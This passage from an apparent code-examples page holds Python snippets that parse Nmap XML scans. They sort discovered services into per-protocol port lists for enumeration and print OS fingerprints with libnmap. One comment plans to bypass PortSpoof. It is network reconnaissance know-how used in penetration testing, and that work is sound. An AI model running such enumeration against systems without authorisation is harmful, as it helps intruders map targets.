                                                8] not in self.http_script_results:
                                            self.http_script_results.append(
                                                service[8])
                        if "netbios-ssn" in service[1]:
                            if service[0] not in self.smb_ports:
                                self.smb_ports.append(service[0])
                        if "microsoft-ds" in service[1]:
                            if service[0] not in self.smb_ports:
                                self.smb_ports.append(service[0])
                        if "domain" in service[1]:
                            if service[0] not in self.dns_ports:
                                self.dns_ports.append(service[0])
                        if "http-proxy" in service[1]:
                            if service[0] not in self.proxy_ports:
                                self.proxy_ports.append(service[0])
                        if "ssh" in service[1]:
                            if service[0] not in self.ssh_ports:
                                self.ssh_ports.append(service[0])
                            if service[5] not in self.ssh_product:
                                self.ssh_product.append(service[5])
                            if service[6] not in self.ssh_version:
                                self.ssh_version.append(service[6])
                            if service[8] not in self.ssh_script_results:
                                self.ssh_script_results.append(service[8])
                        if "oracle-tns" in service[1]:
                            if service[0] != 49160:
                                if service[0] not in self.oracle_tns_ports:
                                    self.oracle_tns_ports.append(service[0])
                        if "ftp" in service[1]:
                            if service[0] not in self.ftp_ports:
                                self.ftp_ports.append(service[0])
                            if service[5] not in self.ftp_product:
                                self.ftp_product.append(service[5])
                            if service[6] not in self.ftp_version:
                                self.ftp_version.append(service[6])
                        if "smtp" in service[1]:
                            if service[0] not in self.smtp_ports:
                                self.smtp_ports.append(service[0])
                            if service[4] not in self.smtp_version:
                                self.smtp_version.append(service[4])
                            if service[5] not in self.smtp_product:
                                self.smtp_product.append(service[5])
                        if "rpcbind" in service[1]:
                            if service[0] not in self.nfs_ports:
                                self.nfs_ports.append(service[0])
                        if "msrpc" in service[1]:
                            if service[0] not in self.rpc_ports:
                                self.rpc_ports.append(service[0])
                        if "ldap" in service[1]:
                            if service[0] not in self.ldap_ports:
                                self.ldap_ports.append(service[0])
                        if "BaseHTTPServer" in service[4]:
                            if service[0] not in self.http_ports:
                                self.http_ports.append(service[0])
                        if "Apache" in service[5] and (
                                "ssl/http" not in service[1]) and (
                                    "ssl"
                                    not in service[2]) and ("ssl"
                                                            not in service[1]):
                            if service[0] not in self.http_ports:
                                self.http_ports.append(service[0])
                        if "telnet" in service[1]:
                            if service[0] not in self.telnet_ports:
                                self.telnet_ports.append(service[0])
                        if "asterisk" in service[1]:
                            if service[0] not in self.sip_ports:
                                self.sip_ports.append(service[0])
                        if "vnc" in service[1]:
                            if service[0] not in self.vnc_ports:
                                self.vnc_ports.append(service[0])
                        if "cassandra" in service[1]:
                            if service[0] not in self.cassandra_ports:
                                self.cassandra_ports.append(service[0])
                        if "ms-sql" in service[1]:
                            if service[0] not in self.mssql_ports:
                                self.mssql_ports.append(service[0])
                        if "mysql" in service[1]:
                            if service[0] not in self.mysql_ports:
                                self.mysql_ports.append(service[0])
                        if "finger" in service[1]:
                            if service[0] not in self.finger_ports:
                                self.finger_ports.append(service[0])
                        if "mongod" in service[1]:
                            if service[0] not in self.mongo_ports:
                                self.mongo_ports.append(service[0])
                        if "pop3" in service[1]:
                            if service[0] not in self.pop3_ports:
                                self.pop3_ports.append(service[0])
                        if "kerberos" in service[1]:
                            if service[0] not in self.kerberos_ports:
                                self.kerberos_ports.append(service[0])
                        if "kpasswd" in service[1]:
                            if service[0] not in self.kerberos_ports:
                                self.kerberos_ports.append(service[0])
                        if service[4] not in self.banners:
                            self.banners.append(service[4])
                        if service[5] not in self.all_products:
                            self.all_products.append(service[5])

                if len(self.http_script_results) != 0:
                    for t in self.http_script_results[0]:
                        result = t["id"], t["output"]
                        if "http-title" in result:
                            if result[1] not in self.http_script_title:
                                self.http_script_title.append(result[1])

                # Print Statements for Debugging Purposes..
                # print("HTTP PORTS:", self.http_ports)
                # if len(self.http_script_results) != 0:
                #     print("HTTP-Script-Results:", self.http_script_results[0])
                # print("ORACLE PORTS:", self.oracle_tns_ports)
                # print("OPEN TCP PORTS:", self.tcp_ports)
                # print("SSL:", self.ssl_ports)
                # print("SMB:", self.smb_ports)
                # print("DNS:", self.dns_ports)
                # print("Services:", self.services)
                # print("SSH:", self.ssh_ports)
                # print("SSH VERSION:", self.ssh_version)
                # print("FTP VERSION:", self.ftp_version)
                # print("FTP PRODUCT", self.ftp_product)
                # print("Proxy Ports:", self.proxy_ports)
                # print("SSH-Product", self.ssh_product)
                if len(self.tcp_ports) > 100:
                    print(
                        "Server is Configured to Falsely show all ports as open."
                    )
                    print(
                        "ToDo: Create Alternative Scanning Technique to bypass PortSpoof."
                    )
                    print(
                        "Exiting for now. Continue Your enumeration Manually, Check if http or https are open"
                    )
                    print(
                        "by manually trying to view these ports in the web browser. etc. etc."
                    )
                    exit()
            except Exception as e:
                print(
                    f"""{c.getPath("nmap", "nmap_top_ports_xml")} Cannot Parse Top Ports nmap xml file. {e}"""
                )
                return
#!/usr/bin/env python

from libnmap.parser import NmapParser

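# Load the sample OS-detection scan; the path is relative to the current
# working directory.
rep = NmapParser.parse_fromfile('libnmap/test/files/os_scan6.xml')

print("{0}/{1} hosts up".format(rep.hosts_up, rep.hosts_total))
for _host in rep.hosts:
    # Only hosts reported as up are listed.
    if not _host.is_up():
        continue
    print("{0} {1}".format(_host.address, " ".join(_host.hostnames)))
    if not _host.os_fingerprinted:
        # Function-call form: the bare `print "..."` statement is a syntax
        # error on Python 3 and was inconsistent with every other print here.
        print("No fingerprint available")
        continue
    print("OS Fingerprint:")
    # Walk each OS match, then its OS classes, then the CPE strings of each class.
    for osm in _host.os.osmatches:
        print("Found Match:{0} ({1}%)".format(osm.name, osm.accuracy))
        for osc in osm.osclasses:
            print("\tOS Class: {0}".format(osc.description))
            for cpe in osc.cpelist:
                print("\tCPE: {0}".format(cpe.cpestring))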
Ejemplo n.º 60
def main():
    """Parse the Nmap XML report and pass it on for processing.

    Reads the file named by ``nmapxml`` (a name defined outside this
    function), passes the parsed report to ``report_parser`` and then calls
    ``end``.
    """
    # The parsed report is only needed as the argument to report_parser.
    report_parser(NmapParser.parse_fromfile(nmapxml))
    end()